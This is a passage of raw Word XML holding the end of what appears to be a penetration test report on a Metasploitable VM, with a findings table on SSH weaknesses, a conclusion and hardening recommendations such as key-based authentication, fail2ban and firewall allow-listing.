              <w:t>Possible data leaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22CA3EF4" w14:textId="2B497244" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Restrict SCP/SFTP to authorized users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w14:paraId="2A171FC8" w14:textId="77777777" w:rsidTr="00FA6096">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3041B625" w14:textId="09512C77" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">No SSH firewall rules </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F5642F" w14:textId="6AC3576D" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Open to external attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5811487F" w14:textId="61293C57" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F3E4E">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Configure firewall to allow trusted IPs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="568B21AA" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6159A5" w14:textId="77777777" w:rsidR="00FA6096" w:rsidRPr="002F3E4E" w:rsidRDefault="00FA6096" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC0791B" w14:textId="3D09249A" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B72678" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19203BA2" w14:textId="655E6E37" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The penetration test demonstrated that weak password policies, lack of SSH access restrictions, and use of outdated software are significant risks to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6D150" w14:textId="21CB8E56" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To mitigate these risks, strong authentication methods, security patches, and access control policies should be implemented immediately. Future security assessments should be performed periodically to ensure continuous protection against evolving threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1FD195" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9E436B" w14:textId="75250DB0" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487977B" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459C363A" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Disable password-based SSH authentication and enforce key-based authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D923AB" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693A0D5E" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Upgrade OpenSSH to the latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FBC77" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238E21F6" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implement fail2ban or other intrusion prevention mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB9903E" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDF6500" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Configure a firewall to allow SSH access only from trusted IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48329FF8" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592FC74E" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Restrict SCP/SFTP file transfers to prevent unauthorized data movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDEFDA" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E742FA" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enforce multi-factor authentication (MFA) for SSH logins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548B6EE5" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23356ECD" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150558D3" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEE86DC" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4C18C1" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4837E5DD" w14:textId="472EE704" w:rsidR="00BB23F1" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00FA6096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEB97B2" w14:textId="77777777" w:rsidR="00BB23F1" w:rsidRPr="002F3E4E" w:rsidRDefault="00BB23F1" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F93763" w14:textId="77777777" w:rsidR="00CD3936" w:rsidRPr="002F3E4E" w:rsidRDefault="00CD3936" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FC75AA" w14:textId="77777777" w:rsidR="00CD3936" w:rsidRPr="002F3E4E" w:rsidRDefault="00CD3936" w:rsidP="00CD3936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F48C2D" w14:textId="540E655B" w:rsidR="00CF7CD1" w:rsidRDefault="00CF7CD1" w:rsidP="00CF7CD1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8655"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5CC780" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110669E9" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3F5855" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A739512" w14:textId="77777777" w:rsidR="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F480213" w14:textId="0884A012" w:rsidR="002F3E4E" w:rsidRPr="002F3E4E" w:rsidRDefault="002F3E4E" w:rsidP="002F3E4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3435"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F3E4E" w:rsidRPr="002F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E098"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="127F58CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3E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7636C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D85A8B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80D50FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED009A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0236371"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="850695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059462">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="710155247">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2082211937">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1341544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D1"/>
    <w:rsid w:val="002F3E4E"/>
    <w:rsid w:val="00364313"/>
    <w:rsid w:val="0069322F"/>
    <w:rsid w:val="006B0DC4"/>
    <w:rsid w:val="007F5568"/>
    <w:rsid w:val="008C5885"/>
    <w:rsid w:val="00BB23F1"/>
    <w:rsid w:val="00C562DF"/>
    <w:rsid w:val="00C720D8"/>
    <w:rsid w:val="00C975DA"/>
    <w:rsid w:val="00CD3936"/>
    <w:rsid w:val="00CF7CD1"/>
    <w:rsid w:val="00DD40B2"/>
    <w:rsid w:val="00E976C0"/>
    <w:rsid w:val="00F713CE"/>
    <w:rsid w:val="00FA6096"/>
    <w:rsid w:val="00FD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C164"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B6D2043E-6A4C-4EDB-96EC-50298DD2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C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7C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7C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7C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7C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7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C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7C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7C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7C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7C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7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CD1"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7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CD1"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00CF7CD1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7CD1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7CD1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7C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7CD1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CF7CD1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF7CD1"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF7CD1"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00FA6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Awuku</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kwame Awuku</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-31T12:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-31T14:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>